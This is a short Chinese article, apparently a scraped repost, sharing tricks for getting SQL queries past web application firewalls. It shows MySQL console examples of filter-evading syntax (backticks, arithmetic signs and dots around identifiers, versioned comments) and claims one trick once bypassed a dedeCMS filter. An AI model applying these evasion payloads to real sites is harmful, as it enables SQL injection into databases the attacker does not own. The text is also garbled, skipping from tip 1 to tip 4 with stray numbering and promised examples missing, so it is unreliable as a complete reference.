WAF绕过的几个窍门
发布时间:2022-05-05 10:16:50 所属栏目:安全 来源:互联网
导读:本文中,笔者与大家分享了几个WAF绕过的技巧。对于一些大家都了解的技巧如:/*!*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM 不再重造轮子。 Mysql: tips1: 神奇的 ` (格式输出表的那个控制符) 过空格 过一些正则。 mysql select id from qs_admins; +----+
本文中,笔者与大家分享了几个WAF绕过的技巧。对于一些大家都了解的技巧如:/*!*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM 不再重造轮子。 Mysql: tips1: 神奇的 ` (格式输出表的那个控制符) 过空格 过一些正则。 mysql> select id from qs_admins; +----+ | id | +----+ | 1 | +----+ 1 row in set (0.00 sec) mysql> select+id-1+1.from qs_admins; +----------+ | +id-1+1. | +----------+ | 1 | +----------+ 1 row in set (0.00 sec) mysql> select-id-1+3.from qs_admins; +----------+ | -id-1+3. | +----------+ | 1 | +----------+ 1 row in set (0.00 sec) mysql> select@^1.from qs_admins; +------+ | @^1. | +------+ | NULL | +------+ 1. 2. 3. 4. 5. 6. 这个是bypass 曾经dedeCMS filter。 或者下面这样也是可以的: tips4:mysql function() as xxx 也可以不用as 和空格 mysql> /*!40000select*/ id from qs_admins; +----+ | id | +----+ | 1 | +----+ 1 row in set (0.00 sec) (编辑:东莞站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
站长推荐